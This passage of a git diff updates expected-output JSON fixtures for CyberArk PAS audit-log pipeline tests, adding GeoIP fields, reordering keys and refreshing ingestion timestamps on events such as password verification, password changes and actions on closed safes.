Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"test12\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1604943844\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"}]}}}}", "code": "22", "kind": "event", @@ -104,10 +104,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -186,7 +195,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.072873500Z", + "ingested": "2021-12-14T14:42:05.178382164Z", "original": "\u003c5\u003e1 2021-03-15T10:22:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e22\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:44\",\"IsoTimestamp\":\"2021-03-15T10:22:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"22\",\"Desc\":\"CPM Verify Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Verify Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "22", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json index 015a865644a..2a8450a7ba6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 7 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 7 + } + }, "cyberarkpas": { "audit": { "severity": "Error", @@ -45,29 +38,33 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:41.393352600Z", + "ingested": "2021-12-14T14:42:05.495507844Z", "original": "\u003c7\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", "action": "action on closed safe", "type": "error" - } - }, - { - "log": { - "syslog": { - "priority": 7 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -83,6 +80,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 7 + } + }, "cyberarkpas": { "audit": { "severity": "Error", @@ -101,29 +103,24 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:41.393360900Z", + "ingested": "2021-12-14T14:42:05.495510359Z", "original": "\u003c7\u003e1 2021-03-14T12:07:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:07:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:07:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e23\u003c/MessageID\u003e\\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eAccountsFeedADAccounts\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:07:27\",\"IsoTimestamp\":\"2021-03-14T12:07:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AccountsFeedADAccounts\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", "action": "action on closed safe", "type": "error" - } - }, - { - "log": { - "syslog": { - "priority": 7 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -139,6 +136,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 7 + } + }, "cyberarkpas": { "audit": { "severity": "Error", @@ -157,15 +159,31 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:36:41.393365600Z", + "ingested": "2021-12-14T14:42:05.495510853Z", "original": "\u003c7\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e23\u003c/MessageID\u003e\\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPConf\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", "action": "action on closed safe", "type": "error" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json index ce8b170d2df..527d21febca 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json @@ -70,7 +70,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.659740900Z", + "ingested": "2021-12-14T14:42:05.852086821Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e24\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=radiussrv.cyberark.local;username=test12;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"test12\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1604943844\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1604944158\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=radiussrv.cyberark.local;username=test12;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"test12\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1604943844\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1604944158\"}]}}}}", "code": "24", "kind": "event", @@ -174,7 +174,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.659748100Z", + "ingested": "2021-12-14T14:42:05.852089238Z", "original": "\u003c5\u003e1 2021-03-08T19:20:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:05\",\"IsoTimestamp\":\"2021-03-08T19:20:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountA;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", @@ -278,7 +278,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.659752800Z", + "ingested": "2021-12-14T14:42:05.852089841Z", "original": "\u003c5\u003e1 2021-03-10T23:39:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:28\",\"IsoTimestamp\":\"2021-03-10T23:39:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountB;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"25\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615419568\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", @@ -383,7 +383,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.659756400Z", + "ingested": "2021-12-14T14:42:05.852090222Z", "original": "\u003c5\u003e1 2021-03-15T10:12:24Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:24\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:24Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e24\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=components;username=x_accountA;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"28\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615803143\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Inactive\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:24\",\"IsoTimestamp\":\"2021-03-15T10:12:24Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountA;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"28\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615803143\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json index e1bdf0441e2..3bb7ea6c3ec 100644 --- 